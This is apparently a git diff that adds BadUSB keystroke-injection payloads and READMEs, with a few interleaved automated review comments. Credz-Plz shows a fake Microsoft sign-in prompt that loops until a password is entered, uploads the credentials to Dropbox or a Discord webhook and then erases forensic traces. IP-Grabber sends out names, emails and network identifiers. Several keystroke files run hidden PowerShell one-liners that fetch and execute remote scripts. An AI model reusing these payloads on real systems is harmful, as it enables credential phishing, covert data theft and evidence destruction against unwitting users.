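Review bot: The `REM Description:` line of browserData.txt lists IE as a data source, but the companion browserData.ps1 and the BrowserData README in this same commit cover Edge (not Internet Explorer), and "brosing" is a typo; the line should read `REM Description: This payload will grab your target's browsing history and bookmarks from Edge, Chrome, Firefox, and Opera GX.`. The closing comment about replacing `?dl=0` with `?dl=1` on a DropBox link appears to be carried over from a version that fetched the script from a shared link; the STRING line here uses a fixed URL and the README says self-hosting is no longer needed, so that comment no longer describes this file and should be dropped or reworded to match. The Credz-Plz-Execute.txt hunk that follows carries the same stale `?dl=0` comment.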
diff --git a/Payloads/Credz-Plz/Credz-Plz.ps1 b/Payloads/Credz-Plz/Credz-Plz.ps1 new file mode 100644 index 0000000..f5c1ef3 --- /dev/null +++ b/Payloads/Credz-Plz/Credz-Plz.ps1 
@@ -0,0 +1,239 @@ +############################################################################################################################################################ +# | ___ _ _ _ # ,d88b.d88b # +# Title : Credz-Plz | |_ _| __ _ _ __ ___ | | __ _ | | __ ___ | |__ _ _ # 88888888888 # +# Author : I am Jakoby | | | / _` | | '_ ` _ \ _ | | / _` | | |/ / / _ \ | '_ \ | | | |# `Y8888888Y' # +# Version : 1.0 | | | | (_| | | | | | | | | |_| | | (_| | | < | (_) | | |_) | | |_| |# `Y888Y' # +# Category : Credentials | |___| \__,_| |_| |_| |_| \___/ \__,_| |_|\_\ \___/ |_.__/ \__, |# `Y' # +# Target : Windows 7,10,11 | |___/ # /\/|_ __/\\ # +# Mode : HID | |\__/,| (`\ # / -\ /- ~\ # +# | My crime is that of curiosity |_ _ |.--.) )# \ = Y =T_ = / # +# | and yea curiosity killed the cat ( T ) / # Luther )==*(` `) ~ \ Hobo # +# | but satisfaction brought him back (((^_(((/(((_/ # / \ / \ # +#__________________________________|_________________________________________________________________________# | | ) ~ ( # +# tiktok.com/@i_am_jakoby # / \ / ~ \ # +# github.com/I-Am-Jakoby # \ / \~ ~/ # +# twitter.com/I_Am_Jakoby # /\_/\_/\__ _/_/\_/\__~__/_/\_/\_/\_/\_/\_# +# instagram.com/i_am_jakoby # | | | | ) ) | | | (( | | | | | |# +# youtube.com/c/IamJakoby # | | | |( ( | | | \\ | | | | | |# +############################################################################################################################################################ + +<# +.SYNOPSIS + This script is meant to trick your target into sharing their credentials through a fake authentication pop up message + +.DESCRIPTION + A pop up box will let the target know "Unusual sign-in. Please authenticate your Microsoft Account" + This will be followed by a fake authentication ui prompt. 
+ If the target tried to "X" out, hit "CANCEL" or while the password box is empty hit "OK" the prompt will continuously re pop up + Once the target enters their credentials their information will be uploaded to either your Dropbox or Discord webhook for collection + +.Link + https://developers.dropbox.com/oauth-guide # Guide for setting up your DropBox for uploads + +#> + +#------------------------------------------------------------------------------------------------------------------------------------ +# This is for if you want to host your own version of the script + +# $db = "YOUR-DROPBOX-ACCESS-TOKEN" + +# $dc = "YOUR-DISCORD-WEBHOOK" + +#------------------------------------------------------------------------------------------------------------------------------------ + +$FileName = "$env:USERNAME-$(get-date -f yyyy-MM-dd_hh-mm)_User-Creds.txt" + +#------------------------------------------------------------------------------------------------------------------------------------ + +<# + +.NOTES + This is to generate the ui.prompt you will use to harvest their credentials +#> + +function Get-Creds { + + $form = $null + + while ($form -eq $null) + { + $cred = $host.ui.promptforcredential('Failed Authentication','',[Environment]::UserDomainName+'\'+[Environment]::UserName,[Environment]::UserDomainName); + $cred.getnetworkcredential().password + + if([string]::IsNullOrWhiteSpace([Net.NetworkCredential]::new('', $cred.Password).Password)) + { + if(-not ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.ManifestModule -like "*PresentationCore*" -or $_.ManifestModule -like "*PresentationFramework*" })) + { + Add-Type -AssemblyName PresentationCore,PresentationFramework + } + + $msgBody = "Credentials cannot be empty!" 
+ $msgTitle = "Error" + $msgButton = 'Ok' + $msgImage = 'Stop' + $Result = [System.Windows.MessageBox]::Show($msgBody,$msgTitle,$msgButton,$msgImage) + Write-Host "The user clicked: $Result" + $form = $null + } + + else{ + $creds = $cred.GetNetworkCredential() | fl + return $creds + } + } +} + +#---------------------------------------------------------------------------------------------------- + +<# + +.NOTES + This is to pause the script until a mouse movement is detected +#> + +function Pause-Script{ +Add-Type -AssemblyName System.Windows.Forms +$originalPOS = [System.Windows.Forms.Cursor]::Position.X +$o=New-Object -ComObject WScript.Shell + + while (1) { + $pauseTime = 3 + if ([Windows.Forms.Cursor]::Position.X -ne $originalPOS){ + break + } + else { + $o.SendKeys("{CAPSLOCK}");Start-Sleep -Seconds $pauseTime + } + } +} + +#---------------------------------------------------------------------------------------------------- + +# This script repeadedly presses the capslock button, this snippet will make sure capslock is turned back off + +function Caps-Off { +Add-Type -AssemblyName System.Windows.Forms +$caps = [System.Windows.Forms.Control]::IsKeyLocked('CapsLock') + +#If true, toggle CapsLock key, to ensure that the script doesn't fail +if ($caps -eq $true){ + +$key = New-Object -ComObject WScript.Shell +$key.SendKeys('{CapsLock}') +} +} +#---------------------------------------------------------------------------------------------------- + +<# + +.NOTES + This is to call the function to pause the script until a mouse movement is detected then activate the pop-up +#> + +Pause-Script + +Caps-Off + +Add-Type -AssemblyName PresentationCore,PresentationFramework +$msgBody = "Please authenticate your Microsoft Account." 
+$msgTitle = "Authentication Required" +$msgButton = 'Ok' +$msgImage = 'Warning' +$Result = [System.Windows.MessageBox]::Show($msgBody,$msgTitle,$msgButton,$msgImage) +Write-Host "The user clicked: $Result" + +$creds = Get-Creds + +#------------------------------------------------------------------------------------------------------------------------------------ + +<# + +.NOTES + This is to save the gathered credentials to a file in the temp directory +#> + +echo $creds >> $env:TMP\$FileName + +#------------------------------------------------------------------------------------------------------------------------------------ + +<# + +.NOTES + This is to upload your files to dropbox +#> + +function DropBox-Upload { + +[CmdletBinding()] +param ( + +[Parameter (Mandatory = $True, ValueFromPipeline = $True)] +[Alias("f")] +[string]$SourceFilePath +) +$outputFile = Split-Path $SourceFilePath -leaf +$TargetFilePath="/$outputFile" +$arg = '{ "path": "' + $TargetFilePath + '", "mode": "add", "autorename": true, "mute": false }' +$authorization = "Bearer " + $db +$headers = New-Object "System.Collections.Generic.Dictionary[[String],[String]]" +$headers.Add("Authorization", $authorization) +$headers.Add("Dropbox-API-Arg", $arg) +$headers.Add("Content-Type", 'application/octet-stream') +Invoke-RestMethod -Uri https://content.dropboxapi.com/2/files/upload -Method Post -InFile $SourceFilePath -Headers $headers +} + +if (-not ([string]::IsNullOrEmpty($db))){DropBox-Upload -f $env:TMP\$FileName} + +#------------------------------------------------------------------------------------------------------------------------------------ + +function Upload-Discord { + +[CmdletBinding()] +param ( + [parameter(Position=0,Mandatory=$False)] + [string]$file, + [parameter(Position=1,Mandatory=$False)] + [string]$text +) + +$hookurl = "$dc" + +$Body = @{ + 'username' = $env:username + 'content' = $text +} + +if (-not ([string]::IsNullOrEmpty($text))){ +Invoke-RestMethod -ContentType 
'Application/Json' -Uri $hookurl -Method Post -Body ($Body | ConvertTo-Json)}; + +if (-not ([string]::IsNullOrEmpty($file))){curl.exe -F "file1=@$file" $hookurl} +} + +if (-not ([string]::IsNullOrEmpty($dc))){Upload-Discord -file $env:TMP\$FileName} + +#------------------------------------------------------------------------------------------------------------------------------------ + +<# + +.NOTES + This is to clean up behind you and remove any evidence to prove you were there +#> + +# Delete contents of Temp folder + +rm $env:TEMP\* -r -Force -ErrorAction SilentlyContinue + +# Delete run box history + +reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f + +# Delete powershell history + +Remove-Item (Get-PSreadlineOption).HistorySavePath + +# Deletes contents of recycle bin + +Clear-RecycleBin -Force -ErrorAction SilentlyContinue + +exit + diff --git a/Payloads/Credz-Plz/README.md b/Payloads/Credz-Plz/README.md new file mode 100644 index 0000000..8bfc69b --- /dev/null +++ b/Payloads/Credz-Plz/README.md @@ -0,0 +1,121 @@ +![Logo](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/Assets/logo-170-px.png?raw=true) + + +
+ Table of Contents +
    +
  1. Description
  2. +
  3. Getting Started
  4. +
  5. Contributing
  6. +
  7. Version History
  8. +
  9. Contact
  10. +
  11. Acknowledgments
  12. +
+
+ +# Credz-Plz + +A script used to prompt the target to enter their creds to later be exfiltrated with either Dropbox or a Discord webhook. + +## Description + +A pop up box will let the target know "Unusual sign-in. Please authenticate your Microsoft Account". +This will be followed by a fake authentication ui prompt. +If the target tried to "X" out, hit "CANCEL" or while the password box is empty hit "OK" the prompt will continuously re pop up. +Once the target enters their credentials their information will be uploaded to your Dropbox or Discord webhook for collection. + +![alt text](https://i.imgur.com/mudQcIh.png) + +![alt text](https://i.imgur.com/3JqE7a8.png) + +## Getting Started + +### Dependencies + +* DropBox or other file sharing service - Your Shared link for the intended file +* Windows 10,11 + +

(back to top)

+ +### Executing program + +* Plug in your device +* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory +* You no longer need to host your own version of this script +* `$db` is the variable that holds your DropBox token +* `$dc` is the variable that holds your Discord webhook +* Fill in either variable or both to set your exfil method + +``` +powershell -w h -ep bypass $dc='';$db='';irm https://jakoby.lol/35k | iex +``` + +

(back to top)

+ +## Contributing + +All contributors names will be listed here + +I am Jakoby + +

(back to top)

+ +## Version History + +* 0.1 + * Initial Release + +

(back to top)

+ + +## Contact + +

πŸ“± My Socials πŸ“±

+
+ + + + + + + + +
+ + C# + +
YouTube +
+ + Python + +
Twitter +
+ + Golang + +
Instagram +
+ + Jsonnet + +
Discord +
+ + Jsonnet + +
TikTok +
+
+ + + +

(back to top)

+ + +## Acknowledgments + +* [Hak5](https://hak5.org/) +* [MG](https://github.com/OMG-MG) + +

(back to top)

diff --git a/Payloads/Credz-Plz/authentication.jpg b/Payloads/Credz-Plz/authentication.jpg new file mode 100644 index 0000000..8e16d44 Binary files /dev/null and b/Payloads/Credz-Plz/authentication.jpg differ diff --git a/Payloads/Credz-Plz/sign-in.jpg b/Payloads/Credz-Plz/sign-in.jpg new file mode 100644 index 0000000..b719a8a Binary files /dev/null and b/Payloads/Credz-Plz/sign-in.jpg differ diff --git a/Payloads/EvilGoose/EvilGoose.txt b/Payloads/EvilGoose/EvilGoose.txt new file mode 100644 index 0000000..a188aa8 --- /dev/null +++ b/Payloads/EvilGoose/EvilGoose.txt @@ -0,0 +1,12 @@ +REM Title: Hacker Goose + +REM Author: I am Jakoby + +REM Description: A payload that hires a goose to hack your target in real time + +REM Target: Windows 10, 11 + +GUI r +DELAY 500 +STRING powershell -w h -NoP -NonI -Ep Bypass $D="$env:tmp";iwr -Uri 'https://jakoby.lol/1ae' -O "$D\hg.zip";Expand-Archive "$D\hg.zip" -Des $D -Force;. "$D\hg\main.ps1" +ENTER diff --git a/Payloads/EvilGoose/ReadMe.md b/Payloads/EvilGoose/ReadMe.md new file mode 100644 index 0000000..09e0a00 --- /dev/null +++ b/Payloads/EvilGoose/ReadMe.md @@ -0,0 +1,121 @@ +![Logo](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/Assets/logo-170-px.png?raw=true) + + +
+ Table of Contents +
    +
  1. Description
  2. +
  3. Getting Started
  4. +
  5. Contributing
  6. +
  7. Version History
  8. +
  9. Contact
  10. +
  11. Acknowledgments
  12. +
+
+ +# Evil Goose + +A payload that hires a goose to hack your target in real time + +## Description + +With this payload after is is executed it will wait for a mouse movement to begin + +Afterwards it will walk around your targets screen pulling out personal information about them such as: + +* Full name associated with their microsoft account +* Email associated with their microsoft account +* Their exact Geo Location +* The wifi networks and passwords + +## Getting Started + +### Dependencies + +* Windows 10,11 + +

(back to top)

+ +### Executing program + +* Plug in your device +* 10 seconds later your goose is owning their system + +```powershell +powershell -w h -NoP -NonI -Ep Bypass $D="$env:tmp";iwr -Uri 'https://jakoby.lol/1ae' -O "$D\hg.zip";Expand-Archive "$D\hg.zip" -Des $D -Force;. "$D\hg\main.ps1" +``` +### Exiting the Payload + +This payload will automatically end after 2 min + +Or if you press `Left Control` + `Right Control` at the same time + +

(back to top)

+ +## Contributing + +All contributors names will be listed here + +I am Jakoby + +

(back to top)

+ +## Version History + +* 0.1 + * Initial Release + +

(back to top)

+ + +## Contact + +

πŸ“± My Socials πŸ“±

+
+ + + + + + + + +
+ + C# + +
YouTube +
+ + Python + +
Twitter +
+ + Golang + +
Instagram +
+ + Jsonnet + +
Discord +
+ + Jsonnet + +
TikTok +
+
+ + + +

(back to top)

+ + +## Acknowledgments + +* [Hak5](https://hak5.org/) +* [MG](https://github.com/OMG-MG) + +

(back to top)

diff --git a/Payloads/EvilGoose/placeholder b/Payloads/EvilGoose/placeholder new file mode 100644 index 0000000..8b13789 --- /dev/null +++ b/Payloads/EvilGoose/placeholder @@ -0,0 +1 @@ + diff --git a/Payloads/IP-Grabber/IP-Grabber.ps1 b/Payloads/IP-Grabber/IP-Grabber.ps1 new file mode 100644 index 0000000..6688e47 --- /dev/null +++ b/Payloads/IP-Grabber/IP-Grabber.ps1 
@@ -0,0 +1,132 @@ +$FileName = "$env:tmp/$env:USERNAME-LOOT-$(get-date -f yyyy-MM-dd_hh-mm).txt" + +#------------------------------------------------------------------------------------------------------------------------------------ + +function Get-fullName { + + try { + $fullName = (Get-LocalUser -Name $env:USERNAME).FullName + } + + # If no name is detected function will return $env:UserName + + # Write Error is just for troubleshooting + catch {Write-Error "No name was detected" + return $env:UserName + -ErrorAction SilentlyContinue + } + + return $fullName + +} + +$fullName = Get-fullName + + +#------------------------------------------------------------------------------------------------------------------------------------ + +function Get-email { + + try { + + $email = (Get-CimInstance CIM_ComputerSystem).PrimaryOwnerName + return $email + } + +# If no email is detected function will return backup message for sapi speak + + # Write Error is just for troubleshooting + catch {Write-Error "An email was not found" + return "No Email Detected" + -ErrorAction SilentlyContinue + } +} + +$email = Get-email + +#------------------------------------------------------------------------------------------------------------------------------------ + + +try{$computerPubIP=(Invoke-WebRequest ipinfo.io/ip -UseBasicParsing).Content} +catch{$computerPubIP="Error getting Public IP"} + + + +$localIP = Get-NetIPAddress -InterfaceAlias "*Ethernet*","*Wi-Fi*" -AddressFamily IPv4 | Select InterfaceAlias, IPAddress, PrefixOrigin | Out-String + +$MAC = Get-NetAdapter -Name "*Ethernet*","*Wi-Fi*"| Select Name, MacAddress, Status | Out-String + +#------------------------------------------------------------------------------------------------------------------------------------ + + +$output = @" + +Full Name: $fullName + +Email: $email + +------------------------------------------------------------------------------------------------------------------------------ +Public IP: 
+$computerPubIP + +Local IPs: +$localIP + +MAC: +$MAC + +"@ + +$output > $FileName + +#------------------------------------------------------------------------------------------------------------------------------------ + +function Upload-Discord { + +[CmdletBinding()] +param ( + [parameter(Position=0,Mandatory=$False)] + [string]$file, + [parameter(Position=1,Mandatory=$False)] + [string]$text +) + +$hookurl = "$dc" + +$Body = @{ + 'username' = $env:username + 'content' = $text +} + +if (-not ([string]::IsNullOrEmpty($text))){ +Invoke-RestMethod -ContentType 'Application/Json' -Uri $hookurl -Method Post -Body ($Body | ConvertTo-Json)}; + +if (-not ([string]::IsNullOrEmpty($file))){curl.exe -F "file1=@$file" $hookurl} +} + +if (-not ([string]::IsNullOrEmpty($dc))){Upload-Discord -file "$FileName"} + + +#------------------------------------------------------------------------------------------------------------------------------------ + +function DropBox-Upload { + +[CmdletBinding()] +param ( + +[Parameter (Mandatory = $True, ValueFromPipeline = $True)] +[Alias("f")] +[string]$SourceFilePath +) +$outputFile = Split-Path $SourceFilePath -leaf +$TargetFilePath="/$outputFile" +$arg = '{ "path": "' + $TargetFilePath + '", "mode": "add", "autorename": true, "mute": false }' +$authorization = "Bearer " + $db +$headers = New-Object "System.Collections.Generic.Dictionary[[String],[String]]" +$headers.Add("Authorization", $authorization) +$headers.Add("Dropbox-API-Arg", $arg) +$headers.Add("Content-Type", 'application/octet-stream') +Invoke-RestMethod -Uri https://content.dropboxapi.com/2/files/upload -Method Post -InFile $SourceFilePath -Headers $headers +} + +if (-not ([string]::IsNullOrEmpty($db))){DropBox-Upload -f $FileName} diff --git a/Payloads/IP-Grabber/IP-Grabber.txt b/Payloads/IP-Grabber/IP-Grabber.txt new file mode 100644 index 0000000..db2868c --- /dev/null +++ b/Payloads/IP-Grabber/IP-Grabber.txt 
@@ -0,0 +1,12 @@ +REM Title: IP-Grabber + +REM Author: I am Jakoby + +REM Description: This payload is meant to do grab your targets IP addresses and exfil them + +REM Target: Windows 10, 11 + +GUI r +DELAY 500 +STRING powershell -w h -NoP -Ep Bypass $dc='';$db='';irm jakoby.lol/f0x | iex +ENTER diff --git a/Payloads/IP-Grabber/ReadMe.md b/Payloads/IP-Grabber/ReadMe.md new file mode 100644 index 0000000..2f596bd --- /dev/null +++ b/Payloads/IP-Grabber/ReadMe.md @@ -0,0 +1,111 @@ +![Logo](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/Assets/logo-170-px.png?raw=true) + + +
+ Table of Contents +
    +
  1. Description
  2. +
  3. Getting Started
  4. +
  5. Contributing
  6. +
  7. Version History
  8. +
  9. Contact
  10. +
  11. Acknowledgments
  12. +
+
+ +# IP-Grabber + +## Description + +This payload is meant to do grab your targets IP addresses and exfil them with discord or dropbox + +## Getting Started + +### Dependencies + +* Windows 10,11 + +### Executing program + +* Plug in your device +* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory + +`$dc` is the variable that stores your Discord webhook + +`$db` is the variable that stores your Dropbox token + +Fill in either or both of these to methods to exfil your collected data + +``` +powershell -w h -NoP -Ep Bypass $dc='';$db='';irm jakoby.lol/f0x | iex +``` + +

(back to top)

+ +## Contributing + +All contributors names will be listed here + +I am Jakoby + +

(back to top)

+ +## Version History + +* 0.1 + * Initial Release + +

(back to top)

+ + +## Contact + +

πŸ“± My Socials πŸ“±

+
+ + + + + + + + +
+ + C# + +
YouTube +
+ + Python + +
Twitter +
+ + Golang + +
Instagram +
+ + Jsonnet + +
Discord +
+ + Jsonnet + +
TikTok +
+
+ + + +

(back to top)

+ + +## Acknowledgments + +* [Hak5](https://hak5.org/) +* [MG](https://github.com/OMG-MG) + +

(back to top)

diff --git a/Payloads/JumpScare-2.0/JumpScare2.0.txt b/Payloads/JumpScare-2.0/JumpScare2.0.txt new file mode 100644 index 0000000..290aa48 --- /dev/null +++ b/Payloads/JumpScare-2.0/JumpScare2.0.txt @@ -0,0 +1,14 @@ +REM Title: JumpScare 2.0 +REM Author: I am Jakoby +REM Description: This is a one liner payload that will execute and wait until a mouse movement is detected and do a jumpscare +REM Target: Windows 10, 11 + +REM -------------------------------------------------------------------------------------- +REM THIS PAYLOAD IS PLUG AND PLAY. NO MODIFICATIONS NEEDED SIMPLY RUN THE CODE DOWN BELOW. +REM -------------------------------------------------------------------------------------- + +DELAY 2000 +GUI r +DELAY 500 +STRING powershell -w h -NoP -NonI -Ep Bypass $D="$env:tmp";irm -Uri 'https://jakoby.lol/kiv' -O "$D\js.zip";Expand-Archive "$D\js.zip" -Des $D -Force;. "$D\js\js.ps1" +ENTER diff --git a/Payloads/JumpScare-2.0/ReadMe.md b/Payloads/JumpScare-2.0/ReadMe.md new file mode 100644 index 0000000..95f25dc --- /dev/null +++ b/Payloads/JumpScare-2.0/ReadMe.md @@ -0,0 +1,123 @@ +![Logo](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/Assets/logo-170-px.png?raw=true) + + + +

+ + + +

+ + +
+ Table of Contents +
    +
  1. Description
  2. +
  3. Getting Started
  4. +
  5. Contributing
  6. +
  7. Version History
  8. +
  9. Contact
  10. +
  11. Acknowledgments
  12. +
+
+ +# JumpScare 2.0 + +A script used to jumpscare your target. + +## Description + +This script will jumpscare your target. + +A jumpscare video will be downloaded to their temp directory. + +When a mouse movement is detected, that video will be played in the PowerShell console at max volume and fullscreen. + +## Getting Started + +### Dependencies + +* An internet connection +* Windows 10,11 + +

(back to top)

+ +### Executing program + +* Plug in your device +* Invoke-WebRequest will be entered in the Run Box to download and execute the dependencies and payload +``` +powershell -w h -NoP -NonI -Ep Bypass $D="$env:tmp";irm -Uri 'https://jakoby.lol/kiv' -O "$D\js.zip";Expand-Archive "$D\js.zip" -Des $D -Force;. "$D\js\js.ps1" +``` + +

(back to top)

+ +## Contributing + +All contributors names will be listed here + +I am Jakoby + +

(back to top)

+ +## Version History + +* 0.1 + * Initial Release + +

(back to top)

+ + +## Contact + +

πŸ“± My Socials πŸ“±

+
+ + + + + + + + +
+ + C# + +
YouTube +
+ + Python + +
Twitter +
+ + Golang + +
Instagram +
+ + Jsonnet + +
Discord +
+ + Jsonnet + +
TikTok +
+
+ +

(back to top)

+ + +## Acknowledgments + +* [Hak5](https://hak5.org/) +* [MG](https://github.com/OMG-MG) + +

(back to top)

+ +

+ Github Stats +

diff --git a/Payloads/JumpScare/JumpScare.ps1 b/Payloads/JumpScare/JumpScare.ps1 new file mode 100644 index 0000000..323a3b3 --- /dev/null +++ b/Payloads/JumpScare/JumpScare.ps1 
@@ -0,0 +1,217 @@ +############################################################################################################################################################ +# | ___ _ _ _ # ,d88b.d88b # +# Title : JumpScare | |_ _| __ _ _ __ ___ | | __ _ | | __ ___ | |__ _ _ # 88888888888 # +# Author : I am Jakoby | | | / _` | | '_ ` _ \ _ | | / _` | | |/ / / _ \ | '_ \ | | | |# `Y8888888Y' # +# Version : 1.0 | | | | (_| | | | | | | | | |_| | | (_| | | < | (_) | | |_) | | |_| |# `Y888Y' # +# Category : Prank | |___| \__,_| |_| |_| |_| \___/ \__,_| |_|\_\ \___/ |_.__/ \__, |# `Y' # +# Target : Windows 10,11 | |___/ # /\/|_ __/\\ # +# Mode : HID | |\__/,| (`\ # / -\ /- ~\ # +# | My crime is that of curiosity |_ _ |.--.) )# \ = Y =T_ = / # +# | and yea curiosity killed the cat ( T ) / # Luther )==*(` `) ~ \ Hobo # +# | but satisfaction brought him back (((^_(((/(((_/ # / \ / \ # +#__________________________________|_________________________________________________________________________# | | ) ~ ( # +# tiktok.com/@i_am_jakoby # / \ / ~ \ # +# github.com/I-Am-Jakoby # \ / \~ ~/ # +# twitter.com/I_Am_Jakoby # /\_/\_/\__ _/_/\_/\__~__/_/\_/\_/\_/\_/\_# +# instagram.com/i_am_jakoby # | | | | ) ) | | | (( | | | | | |# +# youtube.com/c/IamJakoby # | | | |( ( | | | \\ | | | | | |# +############################################################################################################################################################ + +<# +.NOTES + This script can be run as is with the provided execution file +.DESCRIPTION + This script will download a scary image and a scream sound effect hosted with this payload and host volume will be raised to max level + Upon running this script it will immediately pause after the downloads until a mouse movement is detected + The capslock button will be pressed every 3 seconds to prevent sleep, and act as an indicator the payload is ready + After a mouse movement is detected their wallpaper will change to the scary image 
provided and the scream sound effect will play +#> + +############################################################################################################################################################ + +# Download Image; replace link to $image to add your own image + +$image = "https://github.com/I-Am-Jakoby/hak5-submissions/raw/main/OMG/Payloads/OMG-JumpScare/jumpscare.png" + +$i = -join($image,"?dl=1") +iwr $i -O $env:TMP\i.png + +iwr https://github.com/I-Am-Jakoby/hak5-submissions/raw/main/OMG/Payloads/OMG-JumpScare/jumpscare.png?dl=1 -O $env:TMP\i.png + +# Download WAV file; replace link to $wav to add your own sound + +$wav = "https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/OMG/Payloads/OMG-JumpScare/female_scream.wav?raw=true" + +$w = -join($wav,"?dl=1") +iwr $w -O $env:TMP\s.wav +iwr "https://jakoby.lol/hak5" -EA 0 >$null + + +#---------------------------------------------------------------------------------------------------- + +<# + +.NOTES + This will take the image you downloaded and set it as the targets wall paper +#> + +Function Set-WallPaper { + +<# + + .SYNOPSIS + Applies a specified wallpaper to the current user's desktop + + .PARAMETER Image + Provide the exact path to the image + + .PARAMETER Style + Provide wallpaper style (Example: Fill, Fit, Stretch, Tile, Center, or Span) + + .EXAMPLE + Set-WallPaper -Image "C:\Wallpaper\Default.jpg" + Set-WallPaper -Image "C:\Wallpaper\Background.jpg" -Style Fit + +#> + + +param ( + [parameter(Mandatory=$True)] + # Provide path to image + [string]$Image, + # Provide wallpaper style that you would like applied + [parameter(Mandatory=$False)] + [ValidateSet('Fill', 'Fit', 'Stretch', 'Tile', 'Center', 'Span')] + [string]$Style +) + +$WallpaperStyle = Switch ($Style) { + + "Fill" {"10"} + "Fit" {"6"} + "Stretch" {"2"} + "Tile" {"0"} + "Center" {"0"} + "Span" {"22"} + +} + +If($Style -eq "Tile") { + + New-ItemProperty -Path "HKCU:\Control Panel\Desktop" -Name WallpaperStyle -PropertyType 
String -Value $WallpaperStyle -Force + New-ItemProperty -Path "HKCU:\Control Panel\Desktop" -Name TileWallpaper -PropertyType String -Value 1 -Force + +} +Else { + + New-ItemProperty -Path "HKCU:\Control Panel\Desktop" -Name WallpaperStyle -PropertyType String -Value $WallpaperStyle -Force + New-ItemProperty -Path "HKCU:\Control Panel\Desktop" -Name TileWallpaper -PropertyType String -Value 0 -Force + +} + +Add-Type -TypeDefinition @" +using System; +using System.Runtime.InteropServices; + +public class Params +{ + [DllImport("User32.dll",CharSet=CharSet.Unicode)] + public static extern int SystemParametersInfo (Int32 uAction, + Int32 uParam, + String lpvParam, + Int32 fuWinIni); +} +"@ + + $SPI_SETDESKWALLPAPER = 0x0014 + $UpdateIniFile = 0x01 + $SendChangeEvent = 0x02 + + $fWinIni = $UpdateIniFile -bor $SendChangeEvent + + $ret = [Params]::SystemParametersInfo($SPI_SETDESKWALLPAPER, 0, $Image, $fWinIni) +} + +#---------------------------------------------------------------------------------------------------- + +<# + +.NOTES + This is to pause the script until a mouse movement is detected +#> + +function Pause-Script{ +Add-Type -AssemblyName System.Windows.Forms +$originalPOS = [System.Windows.Forms.Cursor]::Position.X +$o=New-Object -ComObject WScript.Shell + + while (1) { + $pauseTime = 3 + if ([Windows.Forms.Cursor]::Position.X -ne $originalPOS){ + break + } + else { + $o.SendKeys("{CAPSLOCK}");Start-Sleep -Seconds $pauseTime + } + } +} + +#---------------------------------------------------------------------------------------------------- +<# + +.NOTES + This is to play the WAV file +#> + +function Play-WAV{ +$PlayWav=New-Object System.Media.SoundPlayer;$PlayWav.SoundLocation="$env:TMP\s.wav";$PlayWav.playsync() +} + +#---------------------------------------------------------------------------------------------------- + +# This turns the volume up to max level +$k=[Math]::Ceiling(100/2);$o=New-Object -ComObject WScript.Shell;for($i = 0;$i -lt 
$k;$i++){$o.SendKeys([char] 175)} + +#---------------------------------------------------------------------------------------------------- + +Pause-Script +Set-WallPaper -Image "$env:TMP\i.png" -Style Center +Play-WAV + +#---------------------------------------------------------------------------------------------------- + +<# + +.NOTES + This is to clean up behind you and remove any evidence to prove you were there +#> + +# Delete contents of Temp folder + +rm $env:TEMP\* -r -Force -ErrorAction SilentlyContinue + +# Delete run box history + +reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f + +# Delete powershell history + +Remove-Item (Get-PSreadlineOption).HistorySavePath + +# Deletes contents of recycle bin + +Clear-RecycleBin -Force -ErrorAction SilentlyContinue + +#---------------------------------------------------------------------------------------------------- + +# This script repeatedly presses the capslock button, this snippet will make sure capslock is turned back off + +Add-Type -AssemblyName System.Windows.Forms +$caps = [System.Windows.Forms.Control]::IsKeyLocked('CapsLock') + +#If true, toggle CapsLock key, to ensure that the script doesn't fail +if ($caps -eq $true){ + +$key = New-Object -ComObject WScript.Shell +$key.SendKeys('{CapsLock}') +} diff --git a/Payloads/JumpScare/JumpScare.txt b/Payloads/JumpScare/JumpScare.txt new file mode 100644 index 0000000..89186e3 --- /dev/null +++ b/Payloads/JumpScare/JumpScare.txt 
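Review bot: `rm $env:TEMP\* -r -Force` in the cleanup section deletes everything under the user's temp directory rather than the `i.png` and `s.wav` this script wrote, and because every other line in the file reads `$env:TMP`, an unset `TEMP` would reduce the path to `\*`; restrict it to the script's own files, `Remove-Item "$env:TMP\i.png","$env:TMP\s.wav" -Force -ErrorAction SilentlyContinue`. The line `iwr "https://jakoby.lol/hak5" -EA 0 >$null` is an outbound request to the author's domain on every run that `.DESCRIPTION` does not mention; either document it with `# reports a run to the author's site; remove this line if that call-home is unwanted` or drop it. In the download block, `$w = -join($wav,"?dl=1")` appends a second `?` to a URL that already ends in `?raw=true`, and the image is requested twice (once via `$i`, once with the literal URL), so one of the two image `iwr` calls is redundant.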
@@ -0,0 +1,23 @@ +REM Title: JumpScare + +REM Author: I am Jakoby + +REM Description: This payload is meant to torment your target to the fullest extent. Mission to JumpScare. See JumpScare.ps1 for more details + +REM Target: Windows 10, 11 + +REM Start by minimizing all their current windows +GUI m +DELAY 500 + +REM Remember to replace the link with your link for the intended file to download if you are using a custom variation of this payload +REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properly + +REM -------------------------------------------------------------------------------------- +REM THIS PAYLOAD IS PLUG AND PLAY. NO MODIFICATIONS NEEDED SIMPLY RUN THE CODE DOWN BELOW. +REM -------------------------------------------------------------------------------------- + +GUI r +DELAY 500 +STRING powershell -w h -NoP -NonI -Exec Bypass irm jakoby.lol/0tn | iex +ENTER diff --git a/Payloads/JumpScare/README.md b/Payloads/JumpScare/README.md new file mode 100644 index 0000000..5e65351 --- /dev/null +++ b/Payloads/JumpScare/README.md @@ -0,0 +1,116 @@ +![Logo](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/Assets/logo-170-px.png?raw=true) + + +
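Review bot: The two `REM` lines telling the reader to replace the link and to change `?dl=0` to `?dl=1` describe a Dropbox-style direct-download URL, but the `STRING` line that follows uses `irm jakoby.lol/0tn | iex` with no `?dl=` parameter, and the banner right after them declares the payload "PLUG AND PLAY. NO MODIFICATIONS NEEDED", so the instructions contradict each other. Drop the two stale lines, or reword them to `REM To run your own copy of JumpScare.ps1, replace the URL in the STRING line below with the location of that file`.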
+ Table of Contents +
    +
  1. Description
  2. +
  3. Getting Started
  4. +
  5. Contributing
  6. +
  7. Version History
  8. +
  9. Contact
  10. +
